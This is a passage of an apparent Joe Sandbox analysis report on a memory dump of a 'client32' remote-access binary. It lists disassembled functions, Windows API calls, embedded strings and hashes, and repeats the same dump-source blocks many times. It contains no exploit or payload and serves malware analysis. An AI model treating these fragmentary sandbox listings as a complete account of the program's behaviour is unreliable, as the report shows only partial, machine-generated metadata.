                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: _malloc_memmove
                                                        • String ID: BLOCKPRINTING$BLOCKPRINTINGPRINTER=*FILETYPES=BLOCK=1$IsA()$RESUMEPRINTINGPRINTER=*FILETYPES=$SETOPTICALDRIVEACCESS$SETOPTICALDRIVEACCESSACCESSMODES=%u$SETUSBMASSSTORAGEACCESS$SETUSBMASSSTORAGEACCESSACCESSMODES=%u$e:\nsmsrc\nsm\1201\1201f2\ctl32\NSMString.h
                                                        • API String ID: 1183979061-2531374130
                                                        • Opcode ID: f08ecb250d5c08f7971151e8345e671584c0b4aeb0ad882087bea4862500d0ab
                                                        • Instruction ID: df2692623f623c820235428dac45199c8cf8223a54f9d11746ef9c8afc1f3fc0
                                                        • Opcode Fuzzy Hash: f08ecb250d5c08f7971151e8345e671584c0b4aeb0ad882087bea4862500d0ab
                                                        • Instruction Fuzzy Hash: E241A17AA00616AFCB01CF64DC90FDEB7F9EF45219F048569E855A7241EB35F908CBA0
                                                        Function 110593D0 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 130windowregistryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • RegisterClassA.USER32(111D925C), ref: 11059432
                                                          • Part of subcall function 11027FB0: GetLastError.KERNEL32(?,00000000,?), ref: 11027FCC
                                                          • Part of subcall function 11027FB0: wsprintfA.USER32 ref: 11028017
                                                          • Part of subcall function 11027FB0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11028053
                                                          • Part of subcall function 11027FB0: ExitProcess.KERNEL32 ref: 11028069
                                                        • CreateWindowExA.USER32(00000000,NSMCobrProxy,11182200,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 11059473
                                                        • SetPropA.USER32(?,NSMCobrProxy,00000000), ref: 110594FD
                                                        • GetMessageA.USER32(00000000,?,00000000,00000000), ref: 11059520
                                                        • TranslateMessage.USER32(?), ref: 11059536
                                                        • DispatchMessageA.USER32(?), ref: 1105953C
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Message$ClassCreateDispatchErrorExitLastProcessPropRegisterTranslateWindowwsprintf
                                                        • String ID: CobrowseProxy.cpp$CobrowseProxy::RunCobrowse$NSMCobrProxy$_bOK$m_hAppWin
                                                        • API String ID: 13347155-1383313024
                                                        • Opcode ID: 0e78c6e4fd56c04fe32ffe47ec9c10ecf785ae34a99339cc59077458bec90890
                                                        • Instruction ID: 5c93ab26ba0373098ed229eca1638e6ca81362b407f281ecacd63ac87fa716a6
                                                        • Opcode Fuzzy Hash: 0e78c6e4fd56c04fe32ffe47ec9c10ecf785ae34a99339cc59077458bec90890
                                                        • Instruction Fuzzy Hash: C0419076E00746AFDB51DF65CC84F9AFBF5AB44718F408569F91697280FB70A800CBA1
                                                        Function 111152F0 Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 96windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 11059580: __wcstoi64.LIBCMT ref: 110595BD
                                                        • GetVersionExA.KERNEL32(?,View,*NoHideFEP,00000000,00000000), ref: 1111534F
                                                        • InterlockedExchange.KERNEL32(111DC144,00000001), ref: 11115375
                                                        • CreateWindowExA.USER32(00000000,button,11182200,50000000,FFFFEC78,00000000,00000014,0000000E,?,00000001,00000000,00000000), ref: 111153BB
                                                        • SetWindowLongA.USER32(00000000,000000FC,11115270), ref: 111153DB
                                                        • SetFocus.USER32(00000000), ref: 111153F2
                                                        • SetWindowLongA.USER32(00000000,000000FC,00000000), ref: 1111540C
                                                        • DestroyWindow.USER32(00000000), ref: 11115422
                                                        • InterlockedExchange.KERNEL32(111DC144,00000000), ref: 11115439
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Window$ExchangeInterlockedLong$CreateDestroyFocusVersion__wcstoi64
                                                        • String ID: *NoHideFEP$View$button
                                                        • API String ID: 1610953178-1502386645
                                                        • Opcode ID: 4a4f39a3776c091e559f97f305575d72accde8dafeae70cae36c9c0c9739092f
                                                        • Instruction ID: 2d5a82bd362b7f12f42ba8e56494d73917878a288bb9a975525e5583549efdad
                                                        • Opcode Fuzzy Hash: 4a4f39a3776c091e559f97f305575d72accde8dafeae70cae36c9c0c9739092f
                                                        • Instruction Fuzzy Hash: 4E31A470609372EFEB908B76CDC9B5AF7A8AB06309F54453DF825D6189E7B0A440CB11
                                                        Function 1100D550 Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 80processCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 110E2E50: LocalAlloc.KERNEL32(00000040,00000014,?,1100D56F,?), ref: 110E2E60
                                                          • Part of subcall function 110E2E50: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,1100D56F,?), ref: 110E2E72
                                                          • Part of subcall function 110E2E50: SetSecurityDescriptorDacl.ADVAPI32(?,00000001,00000000,00000000,?,1100D56F,?), ref: 110E2E84
                                                        • CreateEventA.KERNEL32(?,00000000,00000000,00000000), ref: 1100D587
                                                        • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 1100D5A0
                                                        • _strrchr.LIBCMT ref: 1100D5AF
                                                        • GetCurrentProcessId.KERNEL32 ref: 1100D5BF
                                                        • wsprintfA.USER32 ref: 1100D5E0
                                                        • _memset.LIBCMT ref: 1100D5F1
                                                        • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000001,04000000,00000000,00000000,?,?), ref: 1100D629
                                                        • CloseHandle.KERNEL32(?,00000000), ref: 1100D641
                                                        • CloseHandle.KERNEL32(?), ref: 1100D64A
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CloseCreateDescriptorHandleProcessSecurity$AllocCurrentDaclEventFileInitializeLocalModuleName_memset_strrchrwsprintf
                                                        • String ID: %sNSSilence.exe %u %u$D
                                                        • API String ID: 1760462761-4146734959
                                                        • Opcode ID: 38d3bc3da6cb395c9be1672e1e0789f0a082fd9a3163fbf41da1431788ce246e
                                                        • Instruction ID: 4a2b6ea11212545f69c7d64acb08f887aa5157aeffa75dc865ae6a9c63889310
                                                        • Opcode Fuzzy Hash: 38d3bc3da6cb395c9be1672e1e0789f0a082fd9a3163fbf41da1431788ce246e
                                                        • Instruction Fuzzy Hash: 88219776E51324AFEB50DBA0CC89FDEB77C9B09708F108095F619A71C0DAB0AA44CF65
                                                        Function 11133150 Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 79libraryloaderCOMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        • GetModuleHandleA.KERNEL32(kernel32.dll,ProcessIdToSessionId,00000000,00000000), ref: 11133176
                                                        • GetProcAddress.KERNEL32(00000000), ref: 1113317D
                                                        • GetCurrentProcessId.KERNEL32(00000000), ref: 11133193
                                                        • GetCurrentProcessId.KERNEL32 ref: 111331B1
                                                        • OpenProcess.KERNEL32(00000400,00000000,00000000), ref: 111331BB
                                                        • OpenProcessToken.ADVAPI32(00000000,00000008,00000000), ref: 111331CE
                                                        • GetTokenInformation.ADVAPI32(00000000,0000000C(TokenIntegrityLevel),111D6428,00000004,?), ref: 111331ED
                                                        • CloseHandle.KERNEL32(00000000), ref: 11133214
                                                        • CloseHandle.KERNEL32(00000000), ref: 1113321B
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Process$Handle$CloseCurrentOpenToken$AddressInformationModuleProc
                                                        • String ID: ProcessIdToSessionId$kernel32.dll
                                                        • API String ID: 2536908267-3889420803
                                                        • Opcode ID: f05b8fede040130ca69cc7ab618329d48fe069b5163e5afb1fda5806a126863c
                                                        • Instruction ID: e6be192edd1e3b76cf1fdabe392791c1d0a960b91715f14bd5d837152ad25321
                                                        • Opcode Fuzzy Hash: f05b8fede040130ca69cc7ab618329d48fe069b5163e5afb1fda5806a126863c
                                                        • Instruction Fuzzy Hash: CF21C836A14214AFEB019BA58D88F9EFFBCDB88766F104155FD10D3248D730D505CB64
                                                        Function 11085070 Relevance: 18.1, APIs: 12, Instructions: 149COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • IsValidSid.ADVAPI32(00000000,00000000,00000000,00000000,11085320,00000000,?,?,000F037F,00000000,00000000), ref: 110850AD
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Valid
                                                        • String ID:
                                                        • API String ID: 1304828667-0
                                                        • Opcode ID: 07d1f4d55114712ce09944c96b79fb0dbf7eda27ec4e79ff2eec5c2a7d7a1562
                                                        • Instruction ID: 676b2b3de2148593dc90d10c3e1cfc66e629af1c8c3f0d5084bd27d7bb4b02fe
                                                        • Opcode Fuzzy Hash: 07d1f4d55114712ce09944c96b79fb0dbf7eda27ec4e79ff2eec5c2a7d7a1562
                                                        • Instruction Fuzzy Hash: 6A417372E0422A9FDB11CFA4CC85BAEBBB8EF44755F1041A9FC15E7248D7319901CBA1
                                                        Function 1106D2C0 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 175sleeptimeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • KillTimer.USER32(00000000,?,?,?,111B83A0), ref: 1106D358
                                                        • Sleep.KERNEL32(00000064,?,?,111B83A0), ref: 1106D3A2
                                                        • DeleteCriticalSection.KERNEL32(?,?,?,111B83A0), ref: 1106D430
                                                        • DeleteCriticalSection.KERNEL32(?,?,?,111B83A0), ref: 1106D436
                                                        • DeleteCriticalSection.KERNEL32(?,?,?,111B83A0), ref: 1106D43C
                                                        • DeleteCriticalSection.KERNEL32(?,?,?,111B83A0), ref: 1106D442
                                                        • DeleteCriticalSection.KERNEL32(?,?,?,111B83A0), ref: 1106D448
                                                        • DeleteCriticalSection.KERNEL32(?,?,?,111B83A0), ref: 1106D44E
                                                          • Part of subcall function 11103160: DeleteCriticalSection.KERNEL32(75A37AB0,82E0FB89,?,75A37AA0,00000000,?,00000000,1116FF88,000000FF,?,110B7556), ref: 111031AA
                                                          • Part of subcall function 11103160: EnterCriticalSection.KERNEL32 ref: 111031F5
                                                          • Part of subcall function 11103160: SetEvent.KERNEL32(00000264), ref: 1110321E
                                                          • Part of subcall function 11103160: CloseHandle.KERNEL32(00000264), ref: 11103252
                                                          • Part of subcall function 11103160: WaitForSingleObject.KERNEL32(00000284,000000FF), ref: 11103260
                                                          • Part of subcall function 11103160: CloseHandle.KERNEL32(00000284), ref: 1110326D
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CriticalSection$Delete$CloseHandle$EnterEventKillObjectSingleSleepTimerWait
                                                        • String ID: ..\ctl32\Connect.cpp$idata->dialup == NULL
                                                        • API String ID: 161544936-3355235989
                                                        • Opcode ID: 79aafff9eca0d463449024df2412cdea9a595f767407fb07140581a44bbbffa4
                                                        • Instruction ID: 36ddb0504334873c216a30337e86c42547ebe3cf26056ee2141bf84180dda08e
                                                        • Opcode Fuzzy Hash: 79aafff9eca0d463449024df2412cdea9a595f767407fb07140581a44bbbffa4
                                                        • Instruction Fuzzy Hash: BE51F4B9A046059FD750DBA4C884BAFF7F9AF88308F01415DE95A97280DB74B904CBA1
                                                        Function 11141090 Relevance: 17.7, APIs: 5, Strings: 5, Instructions: 161windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 111409E0: IsWindow.USER32(FFFFC554), ref: 111409ED
                                                          • Part of subcall function 111409E0: IsWindow.USER32(D8458D00), ref: 111409F7
                                                        • IsWindow.USER32(00010001), ref: 111410DB
                                                        • CreateWindowExA.USER32(00000000,AtlAxWin100,about:blank,50300000,80000000,80000000,00000000,00000000,00010001,?,11000000,00000000), ref: 11141138
                                                        • SendMessageA.USER32(00000000,00000000,00000000,00000000), ref: 1114114D
                                                          • Part of subcall function 11027FB0: GetLastError.KERNEL32(?,00000000,?), ref: 11027FCC
                                                          • Part of subcall function 11027FB0: wsprintfA.USER32 ref: 11028017
                                                          • Part of subcall function 11027FB0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11028053
                                                          • Part of subcall function 11027FB0: ExitProcess.KERNEL32 ref: 11028069
                                                        • UpdateWindow.USER32(?), ref: 11141233
                                                        • ShowWindow.USER32(?,00000005), ref: 1114123F
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Window$Message$CreateErrorExitLastProcessSendShowUpdatewsprintf
                                                        • String ID: !IsInit()$..\CTL32\WBObject.cpp$AtlAxWin100$IsWindow(hwndPar)$about:blank
                                                        • API String ID: 3766702438-2471897277
                                                        • Opcode ID: 6ea1114ac6ccd361845ebdefb1f7c21c818829f08718dc757a911fc34c2f1f58
                                                        • Instruction ID: 89a1e59c23e27b181d28c6aea5168aafdb7a37f1fac42e7899e5da6e401d876f
                                                        • Opcode Fuzzy Hash: 6ea1114ac6ccd361845ebdefb1f7c21c818829f08718dc757a911fc34c2f1f58
                                                        • Instruction Fuzzy Hash: EF5153B9B00645AFDB04DFA9CD85FAAFBE9EB49604F108528F519D7784E730E900CB51
                                                        Function 110FB090 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 144COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetTickCount.KERNEL32 ref: 110FB0BE
                                                        • EnterCriticalSection.KERNEL32(111DBDA4), ref: 110FB0D1
                                                        • GetTickCount.KERNEL32 ref: 110FB0D7
                                                        • GetTickCount.KERNEL32 ref: 110FB223
                                                        • LeaveCriticalSection.KERNEL32(111DBDA4), ref: 110FB22C
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CountTick$CriticalSection$EnterLeave
                                                        • String ID: IsA()$TerminateVistaUI$Warning. simap lock held for %d ms$Warning. took %d ms to get simap lock$e:\nsmsrc\nsm\1201\1201f2\ctl32\DataStream.h
                                                        • API String ID: 956672424-1347840706
                                                        • Opcode ID: 9c62ae52d175db9da93bd6ceb374a3324fc362af68b10af75ace81d4a3c5c9fa
                                                        • Instruction ID: 4ec3a70211b026e7dbc4eeca6b9a79e7af00bbee3c8de0b8751296dd8e751a9c
                                                        • Opcode Fuzzy Hash: 9c62ae52d175db9da93bd6ceb374a3324fc362af68b10af75ace81d4a3c5c9fa
                                                        • Instruction Fuzzy Hash: 2E519C79E0065AAFDB04DFA5D884B9EF7F4FF55318F0481A8E815A7251E730AD44CB90
                                                        Function 110753F0 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 135COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetClientRect.USER32(?,11079302), ref: 11075430
                                                        • BeginDeferWindowPos.USER32(00000008), ref: 11075443
                                                        • GetTopWindow.USER32(?), ref: 11075457
                                                        • GetClassNameA.USER32(00000000,00000000,00000020), ref: 11075477
                                                        • GetWindowLongA.USER32(00000000,00000000), ref: 110754AC
                                                        • GetWindow.USER32(00000000,00000002), ref: 110754C0
                                                        • CopyRect.USER32(00000002,11079302), ref: 110754DF
                                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000017), ref: 11075527
                                                        • EndDeferWindowPos.USER32(00000000), ref: 11075535
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmpDownload File
